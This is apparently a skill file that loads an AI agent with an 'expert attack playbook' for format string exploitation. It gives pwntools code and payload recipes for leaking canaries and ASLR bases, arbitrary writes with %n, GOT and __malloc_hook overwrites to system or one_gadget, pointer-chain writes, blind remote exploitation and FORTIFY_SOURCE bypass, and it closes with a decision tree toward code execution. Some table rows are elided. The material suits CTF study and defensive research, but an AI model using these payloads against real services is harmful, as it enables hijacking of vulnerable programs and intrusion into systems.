format-string-exploitation
SKILL: Format String Exploitation - Expert Attack Playbook
AI LOAD INSTRUCTION: Expert format string techniques. Covers stack reading, arbitrary write via %n, GOT overwrite, __malloc_hook overwrite, pointer chain exploitation, blind format string, FORTIFY_SOURCE bypass, 64-bit null byte handling, and pwntools automation. Distilled from ctf-wiki fmtstr, CTF patterns, and real-world scenarios. Base models often miscalculate positional parameter offsets or forget that 64-bit addresses must be placed after the format specifiers.
0. RELATED ROUTING
- stack-overflow-and-rop — combine format string leak with stack overflow for full exploit
- binary-protection-bypass — format string is the primary canary/PIE/ASLR leak method
- arbitrary-write-to-rce — convert format string write primitive to code execution targets
- heap-exploitation — heap address leak via format string for heap exploitation
1. VULNERABILITY IDENTIFICATION
Vulnerable Pattern
```c
printf(user_input);             // VULNERABLE: user controls format string
fprintf(fp, user_input);        // VULNERABLE
sprintf(buf, user_input);       // VULNERABLE
snprintf(buf, sz, user_input);  // VULNERABLE
printf("%s", user_input);       // SAFE: format string is fixed
```
Quick Test
```
Input: AAAAAAAA%p%p%p%p%p%p%p%p
If the output shows stack values (hex addresses): format string confirmed
Look for 0x4141414141414141 in the output (0x41414141 on 32-bit) to find your input offset
```
2. READING MEMORY
Stack Leak (%p)
| Format | Action | Use |
|---|---|---|
| `%p` | Print next stack value as pointer | Sequential stack dump |
| `%N$p` | Print N-th parameter as pointer | Direct positional access |
| `%N$lx` | Same as `%p` but explicit hex (64-bit) | Portable |
| `%N$s` | Dereference N-th parameter as string pointer | Read memory at pointer value |
Finding Your Input Offset
```python
# Send:   AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
# Output: AAAAAAAA.0x7ffd12340000.0x10.(nil).0x7f1234567890.0x1.0x4141414141414141...
# 0x4141414141414141 is the 6th value → offset = 6 (example)

# Or automated (io is an already-connected pwntools tube):
for i in range(1, 30):
    # 8 marker bytes fill a whole 64-bit slot; tubes expect bytes, not str
    io.sendline(f'AAAAAAAA%{i}$p'.encode())
    if b'0x41414141' in io.recvline():
        print(f'Offset = {i}')
        break
```
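The offset search can also be done offline on a captured dump. The following is a minimal sketch, assuming the dot-separated `%p` layout used above; `find_offset` and the sample string are hypothetical and not part of pwntools.

```python
def find_offset(output, marker="0x4141414141414141"):
    """Return the 1-based positional index of `marker` in a dot-separated %p dump."""
    fields = output.strip().split(".")
    # fields[0] is the echoed prefix (e.g. "AAAAAAAA"); the k-th %p value
    # is fields[k] and corresponds to positional parameter k.
    for index, field in enumerate(fields[1:], start=1):
        if field == marker:
            return index
    return None  # marker not seen: dump more values or check the marker width


# Hypothetical dump for illustration only.
sample = "AAAAAAAA.0x7ffd12340000.0x10.(nil).0x7f1234567890.0x1.0x4141414141414141"
print(find_offset(sample))
```

On a 32-bit target the marker would be `0x41414141` instead.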
Leaking Specific Values
| Target | Method | Stack Position |
|---|---|---|
| Canary | `%N$p` | Typically at input offset + buf_size/8 + a few slots; low byte is 0x00 |
| Saved RBP | `%N$p` | Leaks a stack address → stack layout |
| Return address | `%N$p` | Leaks .text address (PIE base = leak - offset of the return site; the result must be page-aligned) |
| Libc address | `%N$p` | libc base = leak - offset |
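The base calculations in the table reduce to one subtraction plus a sanity check. A minimal sketch follows; `parse_pointer`, `base_from_leak`, and all addresses and offsets are made-up illustrations, and real offsets must come from the target binary and libc.

```python
PAGE_MASK = 0xfff


def parse_pointer(text):
    """Convert one %p field to an int; glibc prints NULL as '(nil)'."""
    return 0 if text == "(nil)" else int(text, 16)


def base_from_leak(leak, known_offset):
    """Subtract the leaked symbol's offset and check that the base is page-aligned."""
    base = leak - known_offset
    if base & PAGE_MASK:
        raise ValueError(f"base {base:#x} is not page-aligned; wrong offset or wrong leak")
    return base


# Hypothetical leaks and offsets, for illustration only.
pie_base = base_from_leak(parse_pointer("0x55d4c3a0123b"), 0x123b)
libc_base = base_from_leak(parse_pointer("0x7f1234829d90"), 0x29d90)
print(hex(pie_base), hex(libc_base))
```

A misaligned result is usually the quickest sign that the leaked slot is not the one you assumed.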
Reading Arbitrary Address (%s)
```python
from pwn import p32, p64

# 32-bit: place the address at the start of the format string
payload = p32(target_addr) + b'%N$s'  # N = offset where target_addr appears on the stack

# 64-bit: the address contains null bytes → place it AFTER the format specifiers
# Example with input starting at offset 7: the 8-byte prefix fills slot 7,
# so the address sits at offset 8 and %8$s reads through it
payload = b'%8$sAAAA' + p64(target_addr)
```
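The index in the 64-bit case depends on how many 8-byte slots the specifier itself occupies. A minimal sketch of that arithmetic, using only the standard library (`struct.pack("<Q", ...)` stands in for `p64`); `build_read_payload` is a hypothetical helper.

```python
import struct


def build_read_payload(input_offset, target_addr, word=8):
    """Build b'%K$s' + padding + address, where K is the slot the address lands in."""
    slots = 1
    while True:
        # The specifier occupies `slots` words, so the address is `slots` past the input.
        spec = f"%{input_offset + slots}$s".encode()
        if len(spec) <= slots * word:
            break
        slots += 1
    # Pad to a word boundary so the address is aligned with a stack slot.
    return spec.ljust(slots * word, b"A") + struct.pack("<Q", target_addr)


# Hypothetical input offset and GOT-like address, for illustration only.
print(build_read_payload(6, 0x404018))
```

The padding bytes are printed after the leaked string, so strip them when parsing the response.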
---
3. WRITING MEMORY (%n)
Write Specifiers
| Specifier | Bytes Written | Value Written |
|---|---|---|
| `%n` | 4 bytes (int) | Characters printed so far |
| `%hn` | 2 bytes (short) | Characters printed so far (mod 0x10000) |
| `%hhn` | 1 byte (char) | Characters printed so far (mod 0x100) |
| `%ln` | 8 bytes (long) | Characters printed so far |
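As a quick illustration of the truncation each specifier applies, the sketch below models the value stored for a given character count. `stored_value` is a hypothetical helper, and the sizes assume a typical LP64 Linux target (int is 4 bytes, long is 8 bytes).

```python
# Bytes stored by each write specifier (assumes LP64: int = 4, long = 8).
WRITE_SIZES = {"%hhn": 1, "%hn": 2, "%n": 4, "%ln": 8}


def stored_value(chars_printed, specifier):
    """Return the bit pattern the specifier stores after `chars_printed` characters."""
    size = WRITE_SIZES[specifier]
    return chars_printed % (1 << (8 * size))


for spec in ("%hhn", "%hn", "%n"):
    print(spec, hex(stored_value(0x12345, spec)))
```

Because only the low bytes survive, a small target value can still be reached after a large count by printing until the count wraps.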
Arbitrary Write Technique
Goal: Write value V to address A.
**32-bit** (address on stack directly):
```python
from pwn import p32

# Write 2 bytes at a time using %hn
# Place target addresses in the format string (they'll be on the stack
# at offsets `offset` and `offset + 1`)
payload = p32(target_addr)       # for low 2 bytes
payload += p32(target_addr + 2)  # for high 2 bytes

# Calculate padding for each %hn write; the two addresses already printed 8 bytes
low = value & 0xffff
high = (value >> 16) & 0xffff
pad_low = (low - 8) % 0x10000
pad_high = (high - low) % 0x10000
# Assumes both pads are nonzero: "%0c" still prints one character
payload += f'%{pad_low}c%{offset}$hn'.encode()
payload += f'%{pad_high}c%{offset + 1}$hn'.encode()
```
**64-bit** (address AFTER format string):
```python
# Addresses contain null bytes (0x00007fXXXXXXXXXX), which terminate the string
# Solution: place addresses AFTER the format specifiers

# Step 1: format string portion (no null bytes); X, Y, N, M are placeholders
fmt = b'%Xc%N$hn%Yc%M$hn'

# Step 2: pad to 8-byte alignment (align = a multiple of 8 that is >= len(fmt))
fmt = fmt.ljust(align, b'A')

# Step 3: append target addresses; N and M must index these two slots
fmt += p64(target_addr)
fmt += p64(target_addr + 2)
```
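The three steps above are circular: the positional indexes depend on the padded format length, which in turn depends on the number of digits in the indexes. One way to resolve this is to grow the reserved slot count until the format fits. The sketch below does that with the standard library only; `build_write64` is a hypothetical helper, not the pwntools implementation.

```python
import struct


def build_write64(input_offset, target_addr, value, chunks=2):
    """Build a 64-bit payload that writes `chunks` 16-bit pieces of `value` with %hn."""
    pieces = [((value >> (16 * i)) & 0xffff, target_addr + 2 * i) for i in range(chunks)]
    pieces.sort()  # ascending values, so each padding is just the difference
    fmt_slots = 1
    while True:
        fmt, printed = b"", 0
        for i, (piece, _) in enumerate(pieces):
            pad = (piece - printed) % 0x10000
            if pad:  # skip zero pads: "%0c" would still print one character
                fmt += f"%{pad}c".encode()
            # Addresses start right after the slots reserved for the format.
            fmt += f"%{input_offset + fmt_slots + i}$hn".encode()
            printed += pad
        if len(fmt) <= fmt_slots * 8:
            break
        fmt_slots += 1
    payload = fmt.ljust(fmt_slots * 8, b"A")  # padding after the last %hn is harmless
    for _, addr in pieces:
        payload += struct.pack("<Q", addr)
    return payload


# Hypothetical offset, address, and value, for illustration only.
print(build_write64(6, 0x404018, 0x401256))
```

With `chunks=2` only the low four bytes of the target are rewritten; pass `chunks=3` to cover all six significant bytes of a user-space address.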
Byte-by-Byte Write with %hhn
Write one byte at a time for precision (6 writes for a full 48-bit address on 64-bit):
```python
from pwn import fmtstr_payload

writes = {}
for i in range(6):
    byte_val = (value >> (i * 8)) & 0xff
    # Pass single bytes as bytes objects: pwntools packs int values to a full
    # machine word, which would make these adjacent writes overlap
    writes[target_addr + i] = bytes([byte_val])

# pwntools handles the math:
payload = fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')
```
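For intuition about the math being automated here, the sketch below plans the `%hhn` writes by hand: visit the target bytes in ascending value order and pad by the difference each time. `plan_byte_writes` is a hypothetical helper and only illustrates the idea; it is not how pwntools is implemented internally.

```python
def plan_byte_writes(writes, numbwritten=0):
    """Return [(address, padding)] in the order the %hhn writes should be emitted."""
    plan = []
    printed = numbwritten
    # Ascending byte values keep most paddings small; the modulo handles any wrap.
    for addr, byte_val in sorted(writes.items(), key=lambda item: item[1]):
        pad = (byte_val - printed) % 0x100
        plan.append((addr, pad))
        printed += pad
    return plan


# Hypothetical target: store 0x7f12 at 0x1000 (little-endian, one byte per write).
print(plan_byte_writes({0x1000: 0x12, 0x1001: 0x7f}))
```

A padding of 0 means the `%c` must be omitted for that write, since `%0c` still prints one character.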
---
4. PWNTOOLS fmtstr_payload()
```python
from pwn import *

context.arch = 'amd64'  # fmtstr_payload sizes addresses from context; set it for 64-bit targets
# libc.symbols[...] is an absolute address only after libc.address is set to the leaked base

# Overwrite GOT entry with target address
payload = fmtstr_payload(
    offset,                                       # stack offset where input appears
    {elf.got['printf']: libc.symbols['system']},  # {addr: value}
    numbwritten=0,                                # bytes already output before our input
    write_size='short'                            # 'byte', 'short', or 'int'
)

# For 64-bit, fmtstr_payload places the addresses after the format string automatically
```
FmtStr Class (Interactive Exploitation)
```python
from pwn import *

def send_payload(payload):
    io.sendline(payload)
    return io.recvline()

fmt = FmtStr(execute_fmt=send_payload)
# fmt.offset is auto-detected
fmt.write(elf.got['printf'], libc.symbols['system'])
fmt.execute_writes()
```
---
5. GOT OVERWRITE VIA FORMAT STRING
Common Targets
| Overwrite | With | Trigger |
|---|---|---|
| `printf@GOT` | `system` | Next `printf(user_input)` call |
| `atoi@GOT` | `system` | If the program calls `atoi(user_input)` |
| … | … | If … |
| … | … | If … |
| `__stack_chk_fail@GOT` | Controlled addr | Bypass canary check entirely |
| … | … | Create infinite loop for multi-shot exploit |
Hook Targets (glibc < 2.34)
| Target | Overwrite With | Trigger |
|---|---|---|
| `__malloc_hook` | one_gadget addr | Any `printf` with a large format width (it calls `malloc` internally) |
| `__free_hook` | … | Trigger … |
6. STACK POINTER CHAIN EXPLOITATION
When the format string is not on the stack (e.g., it is stored in a heap buffer referenced by a stack pointer), the payload cannot supply its own target addresses as arguments. Use pointer chains that already exist on the stack to achieve an arbitrary write.
Two-Stage Write
```
Stack:
  [offset A] → ptr_X  (stack address that points to the slot at offset B)
  [offset B] → ptr_Y  (the value stored where ptr_X points)

Stage 1: Use %A$hn to write through ptr_X, changing the low bytes of ptr_Y → ptr_Y now points to target_addr
Stage 2: Use %B$n to write through the modified ptr_Y → writes to target_addr
```
This requires finding existing pointer chains on the stack (e.g., saved frame pointers forming a chain: rbp → prev_rbp → prev_prev_rbp). glibc typically reads positional arguments before any %n write takes effect, so the two stages normally go in separate printf calls.
Finding Pointer Chains
```python
# Leak the stack with %p and look for:
# 1. A value at offset N that is a stack address A
# 2. The slot at address A, visible at offset M, holding another stack address B
#
# Write through A (using %N$hn) to change the low bytes of B,
# i.e. where the slot at offset M points
# Then write through the modified B (using %M$hn) to reach the target
```
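The two-stage write is easier to follow on a toy memory model. The sketch below simulates both stages on a sparse byte map; the `Memory` class, `percent_hn`, and every address are hypothetical, and the model ignores everything about printf except the store performed by `%hn`.

```python
import struct


class Memory:
    """Sparse byte-addressable memory used to model a few stack slots."""

    def __init__(self):
        self.cells = {}

    def write(self, addr, value, size):
        for i in range(size):  # little-endian store
            self.cells[addr + i] = (value >> (8 * i)) & 0xff

    def read64(self, addr):
        raw = bytes(self.cells.get(addr + i, 0) for i in range(8))
        return struct.unpack("<Q", raw)[0]


def percent_hn(mem, slot_addr, printed):
    """Model %N$hn: store the low 16 bits of `printed` where the slot's value points."""
    mem.write(mem.read64(slot_addr), printed & 0xffff, 2)


SLOT_A, SLOT_B = 0x7ffd00001000, 0x7ffd00001040
TARGET = 0x7ffd00001098           # e.g. a saved return address on the same stack
mem = Memory()
mem.write(SLOT_A, SLOT_B, 8)          # slot A holds ptr_X, which points at slot B
mem.write(SLOT_B, 0x7ffd00001080, 8)  # slot B holds ptr_Y, another stack address
mem.write(TARGET, 0x401256, 8)

percent_hn(mem, SLOT_A, TARGET & 0xffff)  # stage 1: retarget ptr_Y
percent_hn(mem, SLOT_B, 0xbeef)           # stage 2: write through ptr_Y
print(hex(mem.read64(SLOT_B)), hex(mem.read64(TARGET)))
```

Stage 1 only changes two bytes, so the target must share its upper bytes with the original `ptr_Y`; this is why targets on the same stack are the usual choice.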
---
7. BLIND FORMAT STRING
Remote service, no binary, no source: exploit the format string blind.
Methodology
| Step | Action | Purpose |
|---|---|---|
| 1 | Send `%p` × 50 | Dump stack, identify address patterns |
| 2 | Identify offsets | Find libc addrs (0x7f...), stack addrs (0x7ff...), code addrs |
| 3 | Find input offset | Send `AAAAAAAA%N$p` for N = 1..50 |
| 4 | Identify binary base | Code addresses reveal PIE base (or fixed base if no PIE) |
| 5 | Leak GOT entries | If binary base known, read GOT via `%N$s` with the GOT address |
| 6 | Calculate libc base | GOT value - libc symbol offset |
| 7 | Overwrite GOT | Use a `%n`-family write |
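Step 2 can be partly automated with prefix heuristics. The sketch below labels leaked values by their high bits, assuming typical x86-64 Linux layouts with ASLR; `classify` is a hypothetical helper, the ranges are rules of thumb rather than guarantees, and PIE code and heap addresses often share the same prefix.

```python
def classify(value):
    """Guess the region of a leaked 64-bit value (x86-64 Linux heuristics only)."""
    if value == 0:
        return "null"
    if value >> 36 == 0x7ff:          # 0x7ff... : main thread stack
        return "stack"
    if value >> 40 == 0x7f:           # 0x7f...  : libc and other mmap'd regions
        return "libc-or-mmap"
    if value >> 40 in (0x55, 0x56):   # 0x55.../0x56... : PIE image or brk heap
        return "pie-or-heap"
    if 0x400000 <= value < 0x500000:  # classic non-PIE load address
        return "non-pie-code"
    return "other"


# Hypothetical dump values, for illustration only.
for leak in (0x7ffd12340000, 0x7f1234567890, 0x55d4c3a0123b, 0x401256, 0):
    print(hex(leak), classify(leak))
```

Treat the labels as a starting point and confirm them by reading memory at the candidate address with `%N$s`.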
8. FORTIFY_SOURCE BYPASS
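With FORTIFY_SOURCE (`-D_FORTIFY_SOURCE=2`), `printf` is replaced by `__printf_chk`, which blocks `%N$n`. glibc's check also aborts on any `%n` when the format string lives in writable memory, and on positional arguments used with gaps, so confirm what the target actually enforces before relying on the techniques below.
Bypass Techniques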
| Method | Detail |
|---|---|
| Use non-positional `%n` sequentially | Print exact byte count, then `%n` |
| Stack-based exploit | If format string is on stack, use non-positional `%n` with stack position control |
| Heap overflow instead | FORTIFY doesn't protect heap; combine with heap bug |
| Return-to-printf | ROP to call unfortified `printf` |
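A non-positional write has to consume every argument before the target with ordinary conversions while keeping the printed count exact. The sketch below builds such a string; `sequential_write_payload` is a hypothetical helper, and whether the resulting `%n` is accepted depends on the target, since fortified glibc builds may still abort on it.

```python
def sequential_write_payload(arg_index, value):
    """Build a format string whose final %n stores `value` via argument `arg_index`.

    Each %c consumes exactly one argument and prints exactly one character;
    the last %c carries a width so the total printed count equals `value`.
    """
    if arg_index < 2:
        raise ValueError("need at least one argument before the %n target")
    if value < arg_index - 1:
        raise ValueError("value too small: every consumed argument prints a character")
    filler = b"%c" * (arg_index - 2)   # consumes arguments 1 .. arg_index - 2
    width = value - (arg_index - 2)    # consumes argument arg_index - 1
    return filler + f"%{width}c".encode() + b"%n"


# Hypothetical target: store 10 through the 4th argument.
print(sequential_write_payload(4, 10))
```

The same construction works with `%hn` or `%hhn` as the final specifier when only a partial write is needed.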
9. 64-BIT CONSIDERATIONS
| Challenge | Solution |
|---|---|
| Addresses contain null bytes (`\x00`) | Place addresses AFTER format specifiers, pad to alignment |
| Address width: 6 significant bytes | Write 3 × `%hn` or 6 × `%hhn` |
| Larger stack offset range | Positions 1-5 come from registers (rsi, rdx, rcx, r8, r9), so stack data starts at position 6 and input is at offset 6+ |
| 48-bit address space | Only bottom 48 bits of 64-bit used |
Layout Template (64-bit)
```
[format_string_specifiers][padding_to_8byte_align][addr1][addr2][addr3]...
← no null bytes here →                            ← null bytes OK (after fmt) →
```
10. DECISION TREE
```
Format string vulnerability confirmed (printf(user_input))
├── FORTIFY_SOURCE enabled? (__printf_chk)
│   ├── YES → positional %n blocked
│   │   ├── Sequential %n possible? → non-positional write
│   │   └── Combine with another primitive (heap, ROP)
│   └── NO → full positional %n available
├── What do you need first?
│   ├── Leak canary → %N$p at canary stack offset
│   ├── Leak PIE base → %N$p at return address offset → base = leak - known_offset
│   ├── Leak libc base → %N$p at __libc_start_main return on stack
│   ├── Leak heap base → %N$p at heap pointer on stack
│   └── Leak specific address → %N$s with target address on stack
├── Architecture?
│   ├── 32-bit → addresses at start of format string
│   └── 64-bit → addresses after format string (null byte issue)
├── Write target?
│   ├── Partial RELRO → GOT overwrite (printf→system, atoi→system)
│   ├── Full RELRO → __malloc_hook or __free_hook (pre-2.34)
│   ├── Full RELRO + glibc ≥ 2.34 → target _IO_FILE, exit_funcs, TLS_dtor_list
│   └── Stack return address → direct overwrite (if ASLR bypassed)
├── Single-shot or multi-shot?
│   ├── Loop (multi-shot) → overwrite GOT entry incrementally, use pointer chains
│   └── One-shot → fmtstr_payload() with all writes in single payload
└── Input not on stack? (heap buffer)
    └── Use stack pointer chains for indirect writes
```